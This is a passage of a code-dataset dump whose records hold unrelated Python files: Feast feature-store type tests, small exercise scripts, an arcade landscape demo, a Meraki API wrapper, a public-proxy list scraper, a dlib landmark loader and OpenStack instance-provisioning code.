test_feature_get_historical_features_types_match(\n entity_type, feature_dtype, feature_is_list\n):\n with construct_test_environment(GCP_CONFIG) as environment:\n df = create_dataset(entity_type, feature_dtype, feature_is_list)\n data_source = environment.data_source_creator.create_data_source(\n df,\n destination_name=environment.feature_store.project,\n field_mapping={\"ts_1\": \"ts\"},\n )\n fv = create_feature_view(feature_dtype, feature_is_list, data_source)\n fs = environment.feature_store\n entity = driver()\n try:\n fs.apply([fv, entity])\n\n features = [f\"{fv.name}:value\"]\n df = pd.DataFrame()\n df[\"driver_id\"] = [\"1\", \"3\"] if entity_type == ValueType.STRING else [1, 3]\n now = datetime.utcnow()\n ts = pd.Timestamp(now).round(\"ms\")\n df[\"ts\"] = [\n ts - timedelta(hours=4),\n ts - timedelta(hours=2),\n ]\n historical_features = fs.get_historical_features(\n entity_df=df, features=features,\n )\n\n # TODO(adchia): pandas doesn't play well with nan values in ints. 
BQ will also coerce to floats if there are NaNs\n historical_features_df = historical_features.to_df()\n print(historical_features_df)\n if feature_is_list:\n assert_feature_list_types(feature_dtype, historical_features_df)\n else:\n assert_expected_historical_feature_types(\n feature_dtype, historical_features_df\n )\n assert_expected_arrow_types(\n feature_dtype, feature_is_list, historical_features\n )\n finally:\n environment.data_source_creator.teardown()\n\n\n@pytest.mark.integration\n@pytest.mark.parametrize(\n \"entity_type,feature_dtype\",\n entity_type_feature_dtypes,\n ids=[\n entity_feature_types_ids(entity_type, feature_dtype)\n for entity_type, feature_dtype in entity_type_feature_dtypes\n ],\n)\n@pytest.mark.parametrize(\n \"feature_is_list\", [False], ids=lambda v: f\"feature_is_list:{str(v)}\"\n)\ndef test_feature_get_online_features_types_match(\n entity_type, feature_dtype, feature_is_list\n):\n with construct_test_environment(GCP_CONFIG) as environment:\n df = create_dataset(entity_type, feature_dtype, feature_is_list)\n data_source = environment.data_source_creator.create_data_source(\n df,\n destination_name=environment.feature_store.project,\n field_mapping={\"ts_1\": \"ts\"},\n )\n fv = create_feature_view(feature_dtype, feature_is_list, data_source)\n fs = environment.feature_store\n\n features = [fv.name + \":value\"]\n entity = driver(value_type=ValueType.UNKNOWN)\n\n try:\n fs.apply([fv, entity])\n fs.materialize(environment.start_date, environment.end_date)\n driver_id_value = \"1\" if entity_type == ValueType.STRING else 1\n online_features = fs.get_online_features(\n features=features, entity_rows=[{\"driver\": driver_id_value}],\n ).to_dict()\n\n feature_list_dtype_to_expected_online_response_value_type = {\n \"int32\": \"int\",\n \"int64\": \"int\",\n \"float\": \"float\",\n \"string\": \"str\",\n \"bool\": \"bool\",\n }\n assert (\n type(online_features[\"value\"][0]).__name__\n == feature_list_dtype_to_expected_online_response_value_type[\n feature_dtype\n ]\n )\n finally:\n environment.data_source_creator.teardown()\n\n\ndef create_feature_view(feature_dtype, feature_is_list, data_source):\n return driver_feature_view(\n data_source,\n value_type=python_type_to_feast_value_type(\n feature_dtype,\n value=get_feature_values_for_dtype(feature_dtype, feature_is_list)[0],\n ),\n )\n\n\ndef assert_expected_historical_feature_types(\n feature_dtype: str, historical_features_df: pd.DataFrame\n):\n print(\"Asserting historical feature types\")\n feature_dtype_to_expected_historical_feature_dtype = {\n \"int32\": \"int64\",\n \"int64\": \"int64\",\n \"float\": \"float64\",\n \"string\": \"object\",\n \"bool\": \"bool\",\n }\n assert (\n str(historical_features_df.dtypes[\"value\"])\n == feature_dtype_to_expected_historical_feature_dtype[feature_dtype]\n )\n\n\ndef assert_feature_list_types(feature_dtype: str, historical_features_df: pd.DataFrame):\n print(\"Asserting historical feature list types\")\n # Note, these expected values only hold for BQ\n feature_list_dtype_to_expected_historical_feature_list_dtype = {\n \"int32\": \"int\",\n \"int64\": \"int\",\n \"float\": \"float\",\n \"string\": \"str\",\n \"bool\": \"bool\",\n }\n assert str(historical_features_df.dtypes[\"value\"]) == \"object\"\n # Note, this struct schema is only true for BQ and not for other stores\n assert (\n type(historical_features_df.value[0][\"list\"][0][\"item\"]).__name__\n == feature_list_dtype_to_expected_historical_feature_list_dtype[feature_dtype]\n )\n\n\ndef 
assert_expected_arrow_types(\n feature_dtype: str, feature_is_list: bool, historical_features: RetrievalJob\n):\n print(\"Asserting historical feature arrow types\")\n historical_features_arrow = historical_features.to_arrow()\n print(historical_features_arrow)\n feature_list_dtype_to_expected_historical_feature_arrow_type = {\n \"int32\": \"int64\",\n \"int64\": \"int64\",\n \"float\": \"double\",\n \"string\": \"string\",\n \"bool\": \"bool\",\n }\n arrow_type = feature_list_dtype_to_expected_historical_feature_arrow_type[\n feature_dtype\n ]\n if feature_is_list:\n assert (\n str(historical_features_arrow.schema.field_by_name(\"value\").type)\n == f\"struct> not null>\"\n )\n else:\n assert (\n str(historical_features_arrow.schema.field_by_name(\"value\").type)\n == arrow_type\n )\n","sub_path":"sdk/python/tests/integration/registration/test_universal_types.py","file_name":"test_universal_types.py","file_ext":"py","file_size_in_byte":9525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"415349040","text":"def canConstruct(a):\r\n results= ''\r\n for element in a:\r\n results += str(element)\r\n num = int(results)\r\n s = 0\r\n #print(num)\r\n while(num):\r\n s += num%10\r\n num //=10\r\n if(s%3==0):\r\n return(\"Yes\")\r\n else:\r\n return(\"No\")\r\n\r\n\r\na = list(map(int, input().rstrip().split()))\r\nsy = canConstruct(a)\r\nprint(sy)\r\n","sub_path":"DIvBy3.py","file_name":"DIvBy3.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"271417797","text":"import inflect\n\nclass WordRange:\n def __init__(self, start, end, inc=1):\n self.__value=start\n self.__end=end\n self.__inc=inc\n\n if inc > 0:\n self.__dir=1\n else:\n self.__dir=-1\n\n self.__converter = inflect.engine()\n\n\n def __iter__(self):\n return self\n\n def __next__(self):\n\n if self.__dir*self.__value >= self.__end * self.__dir:\n raise StopIteration\n\n word = self.__converter.number_to_words(self.__value)\n self.__value += self.__inc\n\n return word\n\n\n\ndef counter(stop):\n value=0\n while value < stop:\n print ('about to yield ' + str(value))\n yield value\n value += 1\n","sub_path":"python/python-lazy.py","file_name":"python-lazy.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"393584804","text":"import sys\r\nsys.path.append('E:\\\\Spider\\\\movie')\r\nfrom flask import Flask\r\nfrom learn.models.movie import db\r\n\r\ndef creat_app():\r\n app = Flask(__name__)\r\n \r\n app.config.from_object('learn.secure')\r\n app.config.from_object('learn.setting')\r\n \r\n register_blueprint(app)\r\n db.init_app(app)\r\n db.create_all(app=app)\r\n return app\r\n\r\ndef register_blueprint(app):\r\n from learn.web.movie import web\r\n app.register_blueprint(web)","sub_path":"movie/learn/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"490039502","text":"import os\nimport glob\n\nos.chdir(os.path.dirname(__file__))\n\nthe_files = glob.glob(\"./**/*.dds\", recursive = True)\n\nfor file in the_files:\n for end in [\"de\", \"us\", \"es\", \"fr\", \"it\", \"ja\", \"sp\", \"en\", \"jp\", \"ge\"]:\n if \"_\"+end.upper()+\"_1.AMB\" not in file:\n continue\n if end == \"ge\": end = \"de\"\n if end == \"ja\": end = \"jp\"\n if end == \"en\": end = 
\"us\"\n other_place = file.replace(\"_base\", \"_\"+end)\n if not os.path.exists(os.path.dirname(other_place)):\n os.makedirs(os.path.dirname(other_place))\n os.rename(file, other_place)\n","sub_path":"examples/upscale_template/converted/rebase.py","file_name":"rebase.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"638347944","text":"\"\"\"\nMountains Midpoint Displacement\n\nCreate a random mountain range.\nOriginal idea and some code from:\nhttps://bitesofcode.wordpress.com/2016/12/23/landscape-generation-using-midpoint-displacement/\n\nIf Python and Arcade are installed, this example can be run from the command line with:\npython -m arcade.examples.mountains_midpoint_displacement\n\"\"\"\n\n# Library imports\nimport arcade\nimport random\nimport bisect\n\nSCREEN_WIDTH = 1200\nSCREEN_HEIGHT = 700\nSCREEN_TITLE = \"Mountains Midpoint Displacement Example\"\n\n\n# Iterative midpoint vertical displacement\ndef midpoint_displacement(start, end, roughness, vertical_displacement=None,\n num_of_iterations=16):\n \"\"\"\n Given a straight line segment specified by a starting point and an endpoint\n in the form of [starting_point_x, starting_point_y] and [endpoint_x, endpoint_y],\n a roughness value > 0, an initial vertical displacement and a number of\n iterations > 0 applies the midpoint algorithm to the specified segment and\n returns the obtained list of points in the form\n points = [[x_0, y_0],[x_1, y_1],...,[x_n, y_n]]\n \"\"\"\n # Final number of points = (2^iterations)+1\n if vertical_displacement is None:\n # if no initial displacement is specified set displacement to:\n # (y_start+y_end)/2\n vertical_displacement = (start[1]+end[1])/2\n # Data structure that stores the points is a list of lists where\n # each sublist represents a point and holds its x and y coordinates:\n # points=[[x_0, y_0],[x_1, y_1],...,[x_n, y_n]]\n # | | |\n # point 0 point 1 point n\n # The points list is always kept sorted from smallest to biggest x-value\n points = [start, end]\n iteration = 1\n while iteration <= num_of_iterations:\n # Since the list of points will be dynamically updated with the new computed\n # points after each midpoint displacement it is necessary to create a copy\n # of the state at the beginning of the iteration so we can iterate over\n # the original sequence.\n # Tuple type is used for security reasons since they are immutable in Python.\n points_tup = tuple(points)\n for i in range(len(points_tup)-1):\n # Calculate x and y midpoint coordinates:\n # [(x_i+x_(i+1))/2, (y_i+y_(i+1))/2]\n midpoint = list(map(lambda x: (points_tup[i][x]+points_tup[i+1][x])/2,\n [0, 1]))\n # Displace midpoint y-coordinate\n midpoint[1] += random.choice([-vertical_displacement,\n vertical_displacement])\n # Insert the displaced midpoint in the current list of points\n bisect.insort(points, midpoint)\n # bisect allows to insert an element in a list so that its order\n # is preserved.\n # By default the maintained order is from smallest to biggest list first\n # element which is what we want.\n # Reduce displacement range\n vertical_displacement *= 2 ** (-roughness)\n # update number of iterations\n iteration += 1\n return points\n\n\ndef fix_points(points):\n last_y = None\n last_x = None\n new_list = []\n for point in points:\n x = int(point[0])\n y = int(point[1])\n\n if last_y is None or y != last_y:\n if last_y is None:\n last_x = x\n last_y = y\n\n x1 = last_x\n x2 = x\n y1 = last_y\n y2 = y\n\n 
new_list.append((x1, 0))\n new_list.append((x1, y1))\n new_list.append((x2, y2))\n new_list.append((x2, 0))\n\n last_x = x\n last_y = y\n\n x1 = last_x\n x2 = SCREEN_WIDTH\n y1 = last_y\n y2 = last_y\n\n new_list.append((x1, 0))\n new_list.append((x1, y1))\n new_list.append((x2, y2))\n new_list.append((x2, 0))\n\n return new_list\n\n\ndef create_mountain_range(start, end, roughness, vertical_displacement, num_of_iterations, color_start):\n\n shape_list = arcade.ShapeElementList()\n\n layer_1 = midpoint_displacement(start, end, roughness, vertical_displacement, num_of_iterations)\n layer_1 = fix_points(layer_1)\n\n color_list = [color_start] * len(layer_1)\n lines = arcade.create_rectangles_filled_with_colors(layer_1, color_list)\n shape_list.append(lines)\n\n return shape_list\n\n\nclass MyGame(arcade.Window):\n \"\"\"\n Main application class.\n \"\"\"\n\n def __init__(self, width, height, title):\n super().__init__(width, height, title)\n\n self.mountains = None\n\n arcade.set_background_color(arcade.color.WHITE)\n\n def setup(self):\n \"\"\"\n This, and any function with the arcade.decorator.init decorator,\n is run automatically on start-up.\n \"\"\"\n self.mountains = []\n\n background = arcade.ShapeElementList()\n\n color1 = (195, 157, 224)\n color2 = (240, 203, 163)\n points = (0, 0), (SCREEN_WIDTH, 0), (SCREEN_WIDTH, SCREEN_HEIGHT), (0, SCREEN_HEIGHT)\n colors = (color1, color1, color2, color2)\n rect = arcade.create_rectangle_filled_with_colors(points, colors)\n\n background.append(rect)\n self.mountains.append(background)\n\n layer_4 = create_mountain_range([0, 350], [SCREEN_WIDTH, 320], 1.1, 250, 8, (158, 98, 204))\n self.mountains.append(layer_4)\n\n layer_3 = create_mountain_range([0, 270], [SCREEN_WIDTH, 190], 1.1, 120, 9, (130, 79, 138))\n self.mountains.append(layer_3)\n\n layer_2 = create_mountain_range([0, 180], [SCREEN_WIDTH, 80], 1.2, 30, 12, (68, 28, 99))\n self.mountains.append(layer_2)\n\n layer_1 = create_mountain_range([250, 0], [SCREEN_WIDTH, 200], 1.4, 20, 12, (49, 7, 82))\n self.mountains.append(layer_1)\n\n def on_draw(self):\n \"\"\"\n Render the screen.\n \"\"\"\n\n arcade.start_render()\n \"\"\"\n This is called every time we need to update our screen. 
About 60\n times per second.\n \n Just draw things in this function, don't update where they are.\n \"\"\"\n # Call our drawing functions.\n\n for mountain_range in self.mountains:\n mountain_range.draw()\n\n def on_mouse_press(self, x, y, button, key_modifiers):\n \"\"\"\n Called when the user presses a mouse button.\n \"\"\"\n pass\n\n\ndef main():\n \"\"\" Main method \"\"\"\n window = MyGame(SCREEN_WIDTH, SCREEN_HEIGHT, SCREEN_TITLE)\n window.setup()\n arcade.run()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"arcade/examples/mountains_midpoint_displacement.py","file_name":"mountains_midpoint_displacement.py","file_ext":"py","file_size_in_byte":6589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"578009505","text":"\"\"\"Models for Top Rankings for a given Spec.\"\"\"\n\n# IMPORT STANDARD LIBRARIES\nimport datetime\n\n# IMPORT THIRD PARTY LIBRARIES\nimport arrow\nimport mongoengine as me\n\n# IMPORT LOCAL LIBRARIES\nfrom lorgs import utils\nfrom lorgs.logger import logger\nfrom lorgs.models import encounters\nfrom lorgs.models import warcraftlogs_base\nfrom lorgs.models import warcraftlogs_report\nfrom lorgs.models.specs import WowSpec\n\n\nclass SpecRanking(warcraftlogs_base.Document):\n\n spec_slug = me.StringField(required=True)\n boss_slug = me.StringField(required=True)\n\n updated = me.DateTimeField(default=datetime.datetime.utcnow)\n\n reports = me.ListField(me.EmbeddedDocumentField(warcraftlogs_report.Report))\n\n meta = {\n 'indexes': [\n (\"boss_slug\", \"spec_slug\"),\n \"spec_slug\",\n \"boss_slug\",\n ]\n }\n\n ##########################\n # Attributes\n #\n @property\n def spec(self):\n return WowSpec.get(full_name_slug=self.spec_slug)\n\n @property\n def boss(self):\n return encounters.RaidBoss.get(name_slug=self.boss_slug)\n\n @property\n def fights(self):\n return utils.flatten(report.fights for report in self.reports)\n\n @property\n def players(self):\n return utils.flatten(fight.players for fight in self.fights)\n\n @property\n def update_age(self):\n now = arrow.utcnow()\n old = arrow.get(self.updated)\n return now - old\n\n @property\n def update_age_fmt(self):\n now = arrow.utcnow()\n old = arrow.get(self.updated)\n return old.humanize(now, only_distance=True)\n\n ##########################\n # Methods\n #\n def sort_reports(self):\n \"\"\"Sort the reports in place by the highest dps player.\"\"\"\n def get_dps(report):\n top = 0\n for fight in report.fights:\n for player in fight.players:\n top = max(top, player.total)\n return top\n self.reports = sorted(self.reports, key=get_dps, reverse=True)\n\n ##########################\n # Query\n #\n async def load(self, limit=50, clear_old=False):\n \"\"\"Get Top Ranks for a given boss and spec.\"\"\"\n logger.info(f\"{self.boss.name} vs. 
{self.spec.name} {self.spec.wow_class.name} START | limit={limit} | clear_old={clear_old}\")\n\n        # Build and run the query\n        query = f\"\"\"\\\n            worldData\n            {{\n                encounter(id: {self.boss.id})\n                {{\n                    characterRankings(\n                        className: \"{self.spec.wow_class.name_slug_cap}\",\n                        specName: \"{self.spec.name_slug_cap}\",\n                        metric: {self.spec.role.metric},\n                        includeCombatantInfo: false,\n                    )\n                }}\n            }}\n        \"\"\"\n\n        # serverRegion: \"EU\",\n        query_result = await self.client.query(query)\n        query_result = query_result.get(\"worldData\", {}).get(\"encounter\", {}).get(\"characterRankings\", {})\n\n        rankings = query_result.get(\"rankings\", [])\n        if limit:\n            rankings = rankings[:limit]\n\n        if clear_old:\n            self.reports = []\n\n        #########################\n        #\n        #\n        old_reports = []\n        for report in self.reports:\n            for fight in report.fights:\n                for player in fight.players:\n                    key = (report.report_id, fight.fight_id, player.name)\n                    old_reports.append(key)\n\n        new_fights = []\n        for ranking_data in rankings:\n            report_data = ranking_data.get(\"report\", {})\n\n            # skip hidden reports\n            if ranking_data.get(\"hidden\"):\n                continue\n\n            ################\n            # check if already in the list\n            key = (\n                report_data.get(\"code\", \"\"),\n                report_data.get(\"fightID\"),\n                ranking_data.get(\"name\")\n            )\n            if key in old_reports:\n                continue\n\n            ################\n            # Report\n            report = warcraftlogs_report.Report()\n            report.report_id = report_data.get(\"code\", \"\")\n            report.start_time = report_data.get(\"startTime\", 0)\n            self.reports.append(report)\n\n            ################\n            # Fight\n            fight = report.add_fight()\n            fight.fight_id = report_data.get(\"fightID\")\n            fight.start_time = ranking_data.get(\"startTime\", 0) - report.start_time\n            fight.end_time = fight.start_time + ranking_data.get(\"duration\", 0)\n\n            ################\n            # Player\n            player = fight.add_player()\n            player.spec_slug = self.spec_slug\n            player.source_id = -1\n            player.name = ranking_data.get(\"name\")\n            player.total = ranking_data.get(\"amount\", 0)\n\n            new_fights.append(fight)\n\n        ########################\n        # load casts\n        #\n        if new_fights:\n            self.sort_reports()\n\n            # enforce limit\n            if limit:\n                self.reports = self.reports[:limit]\n\n            # the very first report/fight should always have the boss\n            if self.fights:\n                first_fight = self.fights[0]\n                if not first_fight.boss_id:\n                    first_fight.add_boss(self.boss.id)\n                if first_fight not in new_fights:\n                    new_fights.append(first_fight)\n\n        if new_fights:\n            logger.info(f\"{self.boss.name} vs. {self.spec.name} {self.spec.wow_class.name} load casts | {len(new_fights)} new fights\")\n            await self.load_many(new_fights)\n\n        self.updated = datetime.datetime.utcnow()\n","sub_path":"lorgs/models/warcraftlogs_ranking.py","file_name":"warcraftlogs_ranking.py","file_ext":"py","file_size_in_byte":5665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"92412863","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2019/7/19 11:44 AM\n# @Author : zhongch4g\n# @Site : \n# @File : 560. Subarray Sum Equals K.py\n# @Software: IntelliJ IDEA\n\n\nclass Solution:\n    def subarraySum(self, nums, k):\n        nsum = 0\n        # map each running prefix sum to the number of times it has occurred\n        d = {0:1}\n        count = 0\n        for i, num in enumerate(nums):\n            nsum += num\n            if nsum - k in d:\n                count += d[nsum - k]\n            d[nsum] = d.get(nsum, 0) + 1\n        return count\n\n\nnums = [1,1,1]\nk = 2\nsolution = Solution()\nres = solution.subarraySum(nums, k)\nprint(res)\n\n","sub_path":"LeetCode/560. 
Subarray Sum Equals K.py","file_name":"560. Subarray Sum Equals K.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"321039245","text":"# Type each of these into IDLE one at a time to see what happens\n\na, b = 5, 0\nc = a / b # error\n\n4 + 'spam' + 3 #error\n\n'3' + 3 #error\n\ntry:\n    '3' + 3\nexcept TypeError:\n    print( 'Exception : Type error ... stop program' )\n\ntry:\n    '3' + 3\nexcept Exception:\n    print( ' Exception : stop program' )\n\ntry:\n\t'3' + 3\nexcept Exception as e:\n\tprint( ' Exception [{0}] : stop program'.format( e ) )\n\ntry:\n\t3 + 3\nexcept Exception as e :\n\tprint( ' Exception [{0}] : stop program'.format( e ) )\nelse:\n\tprint( 'stop program' )\n\ntry:\n\t'3' + 3\nexcept Exception as e:\n\tprint( ' Exception [{0}] : stop program'.format( e ) )\nfinally:\n\tprint( 'Have a nice day^^' )\n\n","sub_path":"19.07.15.py","file_name":"19.07.15.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"392752474","text":"class MGSubnetPoolSettings(object):\n    def __init__(self, session):\n        super(MGSubnetPoolSettings, self).__init__()\n        self._session = session\n    \n    def getNetworkCellularGatewaySettingsSubnetPool(self, networkId: str):\n        \"\"\"\n        **Return the subnet pool and mask configured for MGs in the network.**\n        https://api.meraki.com/api_docs#return-the-subnet-pool-and-mask-configured-for-mgs-in-the-network\n        \n        - networkId (string)\n        \"\"\"\n\n        metadata = {\n            'tags': ['MG subnet pool settings'],\n            'operation': 'getNetworkCellularGatewaySettingsSubnetPool',\n        }\n        resource = f'/networks/{networkId}/cellularGateway/settings/subnetPool'\n\n        return self._session.get(metadata, resource)\n\n    def updateNetworkCellularGatewaySettingsSubnetPool(self, networkId: str, **kwargs):\n        \"\"\"\n        **Update the subnet pool and mask configuration for MGs in the network.**\n        https://api.meraki.com/api_docs#update-the-subnet-pool-and-mask-configuration-for-mgs-in-the-network\n        \n        - networkId (string)\n        - mask (integer): Mask used for the subnet of all MGs in this network.\n        - cidr (string): CIDR of the pool of subnets. 
Each MG in this network will automatically pick a subnet from this pool.\n \"\"\"\n\n kwargs.update(locals())\n\n metadata = {\n 'tags': ['MG subnet pool settings'],\n 'operation': 'updateNetworkCellularGatewaySettingsSubnetPool',\n }\n resource = f'/networks/{networkId}/cellularGateway/settings/subnetPool'\n\n body_params = ['mask', 'cidr']\n payload = {k: v for (k, v) in kwargs.items() if k in body_params}\n\n return self._session.put(metadata, resource, payload)\n\n","sub_path":"meraki/api/mg_subnet_pool_settings.py","file_name":"mg_subnet_pool_settings.py","file_ext":"py","file_size_in_byte":1764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"448979542","text":"from urllib.request import urlopen, Request\nfrom bs4 import BeautifulSoup\n\n\ndef get_proxy(page_no):\n url = \"https://www.xicidaili.com/nn/{}\".format(page_no)\n req = Request(url, headers={\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36'})\n response = urlopen(req)\n assert (response.getcode() == 200)\n response = response.read()\n\n result = []\n\n container = BeautifulSoup(response, 'html.parser')\n proxy_ips = container.table.find_all('tr')[1:]\n for proxy_ip in proxy_ips:\n elements = proxy_ip.find_all('td')\n protocol = elements[5].text\n if protocol != 'HTTPS':\n continue\n ip = elements[1].text\n port = elements[2].text\n proxy = \"https://{}:{}\".format(ip, port)\n result.append(proxy)\n\n return result\n\n\nwith open(\"proxy.txt\", 'a+') as file:\n for i in range(5):\n proxy_list = get_proxy(i + 1)\n file.writelines(\"%s\\n\" % proxy for proxy in proxy_list)\n","sub_path":"WebScraping/proxy/proxy_scrap.py","file_name":"proxy_scrap.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"463589394","text":"casa=float(input('qual o valor dea casa que deseja comprar?'))\nsalario=float(input('e qual o valor do seu salario?'))\nanos=int(input('em quantos anos pretende pagar ?'))\naaa=anos*12\nprestação=casa/aaa\nif prestação>(30/100*salario):\n print('pra pagar uma casa de R${:.2f}, em {} anos a prestação sera de {:.2f}, assim o valor de emprestimo foi negado!'.format(casa,anos,prestação))\nelse:\n print('o emprestimo foi concedido com sucesso!')\n #esqueci como fazia a atribuição burro","sub_path":"cas.py","file_name":"cas.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"591634717","text":"\n\n#calss header\nclass _QUIZ():\n\tdef __init__(self,): \n\t\tself.name = \"QUIZ\"\n\t\tself.definitions = [u'a game or competition in which you answer questions: ', u'a short informal test: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_quiz.py","file_name":"_quiz.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"488836707","text":"import cv2\nimport dlib\nimport numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\n\ndef load_dlib_data(num, root_path, point):\n # Load the detector\n detector = dlib.get_frontal_face_detector()\n # Load the predictor\n predictor = 
dlib.shape_predictor(\"shape_predictor_68_face_landmarks.dat\")\n # read the image\n img_path = 'img/'\n X = np.ones((num,point,2))\n for file in range(num):\n image = cv2.imread(root_path + img_path + '{}'.format(file) +'.jpg', 0) \n # Use detector to find landmarks\n faces = detector(image)\n for face in faces:\n # Create landmark object\n landmarks = predictor(image=image, box=face)\n # Loop through all the points\n for n in range(0, point):\n X[file][n] = [landmarks.part(n).x,landmarks.part(n).y]\n return X\n\n# Load the csv\ndef load_label(label,root_path):\n labels = pd.read_csv(root_path + 'labels.csv', delim_whitespace = True, header=0)\n Y = labels[[label]]\n Y = np.array(Y)\n return Y\n\n# The one used in main.py\ndef pre_processing(num, label, root_path, point, split = True):\n X = load_dlib_data(num, root_path, point)\n Y = load_label(label, root_path)\n X = X.reshape(X.shape[0],-1) # Match model input\n #determine whether to split the data into training set and test set\n if (split == True):\n x_train, x_test, y_train, y_test = train_test_split(X, Y, train_size=0.8)\n return x_train, x_test, y_train, y_test\n else:\n return X, Y","sub_path":"Dlib_load_data.py","file_name":"Dlib_load_data.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"366913484","text":"#!/usr/bin/env python\n\nimport logging\nimport os\nimport time\n\nimport paramiko\nfrom novaclient.v2 import client\nfrom lib.common import *\nfrom conf import config\nfrom core.authenticator import Authenticator\nimport uuid\n\nlogging.basicConfig(level=logging.INFO)\n\nauthenticator = Authenticator()\n\nclass MisterCluster:\n\n def __init__(self, parameters=None):\n self.nova_clients = {}\n\n # I have re-purposed code from: https://github.com/ChameleonCloud/testing/blob/master/tests/test_chi.py\n def provision_new_instance(self, nova_client, host, user_data=None):\n\n # TODO: network_label is kind of hardcoded: it should be more generic!\n network_label = config.configuration[\"network_label\"]\n network = nova_client.networks.find(label=network_label)\n if network is None:\n logging.error(\"Could not found the requested network (name=%s)\" % (network_label))\n raise \"Could not found the requested network (name=%s)\" % (network_label)\n nics = [{'net-id': network.id}]\n\n # TODO: image_name is kind of hardcoded: it should be more generic!\n image_name = config.configuration[\"image_name\"]\n image = nova_client.images.find(name=image_name)\n if image is None:\n logging.error(\"Could not found the requested image (name=%s)\" % (image_name))\n raise \"Could not found the requested image (name=%s)\" % (image_name)\n\n # TODO: flavor_name is kind of hardcoded: it should be more generic!\n flavor_name = config.configuration[\"flavor_name\"]\n flavor = nova_client.flavors.find(name=flavor_name)\n if flavor is None:\n logging.error(\"Could not found the requested flavor (name=%s)\" % (flavor_name))\n raise \"Could not found the requested flavor (name=%s)\" % (flavor_name)\n\n keypair_name = config.configuration[\"keypair_name\"]\n keypair = nova_client.keypairs.find(name=keypair_name)\n if keypair is None:\n logging.error(\"Could not found the requested keypair (name=%s)\" % (keypair_name))\n raise \"Could not found the requested keypair (name=%s)\" % (keypair_name)\n\n # Boot an instance with the selected parameters\n logging.info(\"Preparing to boot a new nova instance\")\n current_hosts_count = 
len(host.cluster.host_set.all())\n # instance_name = config[\"instance_name_pattern\"] % (current_hosts_count)\n # instance_name = \"%s_%s\" % (cluster_db_object.name, current_hosts_count)\n instance_name = host.name if host.name != \"\" else \"%s%s\" % (host.cluster.name, current_hosts_count)\n instance_name = instance_name.lower()\n instance_name = ''.join([i for i in instance_name if i.isalnum()])\n logging.info(\"Booting a new nova instance with the following name: %s\" % (instance_name))\n instance = nova_client.servers.create(instance_name, image, flavor, key_name=keypair.name, userdata=user_data)\n\n if host.name == \"\":\n host.name = instance_name\n host.save()\n host.instance_id = instance.id\n host.save()\n\n logging.info(\"Waiting for the instance %s to be active\" % (instance_name))\n while instance.status != \"ACTIVE\":\n instance = nova_client.servers.find(id=instance.id)\n time.sleep(10)\n\n logging.info(\"The instance %s is now active!\" % (instance_name))\n\n logging.info(\"Getting the FixedIp of instance %s\" % (instance_name))\n networks_names = instance.networks.keys()\n fixed_ip = None\n if len(networks_names) > 0:\n network_candidate_name = networks_names[0]\n network_candidate_ips = instance.networks[network_candidate_name]\n if len(network_candidate_ips) > 0:\n fixed_ip = network_candidate_ips[0]\n logging.info(\"The FixedIp of instance %s is %s\" % (instance_name, fixed_ip))\n\n if fixed_ip is None:\n raise Exception(\"could not find a network associated to the newly created instance.\")\n\n # Provide a floating IP to the newly created instance\n logging.info(\"I will try to give a FloatingIp to %s\" % (instance_name))\n get_an_available_floating_ip = lambda: nova_client.floating_ips.findall(instance_id=None)\n if get_an_available_floating_ip is None:\n logging.info(\"a new floating IP will be created for instance (%s)\" % (instance.id))\n nova_client.floating_ips.create()\n while not get_an_available_floating_ip():\n time.sleep(5)\n floating_ip = get_an_available_floating_ip()[0]\n logging.info(\"A floating IP (%s) is available for instance (%s)\" % (floating_ip, instance.id))\n\n nova_client.servers.add_floating_ip(instance, floating_ip)\n logging.info(\"A floating IP (%s) has been associated to instance (%s)\" % (floating_ip, instance.id))\n\n # Reload Instance\n instance = nova_client.servers.find(id=instance.id)\n\n logging.info(\"Instance has been provisionned with id=%s\" % (instance.id))\n\n return (instance, host)\n\n def get_novaclient_associated_to_site(self, user, site):\n\n if not site in self.nova_clients:\n import novaclient\n os_auth_url = site.os_auth_url\n username = user.username\n from core.authenticator import Authenticator\n authenticator = Authenticator()\n password = authenticator.decrypt_password(\"tmp/%s\" % (user.username))\n project = user.project\n novaclient = novaclient.v2.client.Client(username, password, project, 